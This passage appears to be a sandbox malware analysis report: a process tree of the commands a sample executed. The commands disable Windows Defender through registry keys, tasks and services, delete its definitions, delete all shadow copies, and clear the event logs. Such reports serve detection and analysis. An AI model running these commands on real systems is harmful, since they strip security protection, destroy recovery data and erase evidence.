  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
PID:2768
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
PID:3672
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
PID:3524
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
PID:3664
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
PID:1472
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
PID:3876
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
PID:1888
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
PID:2640
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
PID:1176
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
PID:2684
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
PID:2756
-
C:\Windows\SysWOW64\schtasks.exe  [2]
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
PID:2088
-
C:\Windows\SysWOW64\schtasks.exe  [2]
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
PID:3496
-
C:\Windows\SysWOW64\schtasks.exe  [2]
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
PID:1316
-
C:\Windows\SysWOW64\schtasks.exe  [2]
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
PID:3676
-
C:\Windows\SysWOW64\schtasks.exe  [2]
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
PID:2572
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
PID:868
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
PID:3592
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
PID:3488
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
- Modifies registry class
PID:1044
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
- Modifies registry class
PID:332
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
- Modifies registry class
PID:3996
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
PID:2052
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
PID:1844
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
PID:1988
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
PID:2944
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
- Modifies security service
PID:3788
-
C:\Windows\SysWOW64\reg.exe  [2]
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
PID:984
-
C:\Windows\SysWOW64\vssadmin.exe  [2]
  vssadmin.exe delete shadows /all /quiet
- Interacts with shadow copies
PID:916
-
C:\Windows\SysWOW64\wevtutil.exe  [2]
  wevtutil.exe cl system
- Suspicious use of AdjustPrivilegeToken
PID:3148 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3184 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2084 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1728 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3252 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1348
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3220 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:3528
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2916 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1552
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3412
Network
MITRE ATT&CK Enterprise v6
Downloads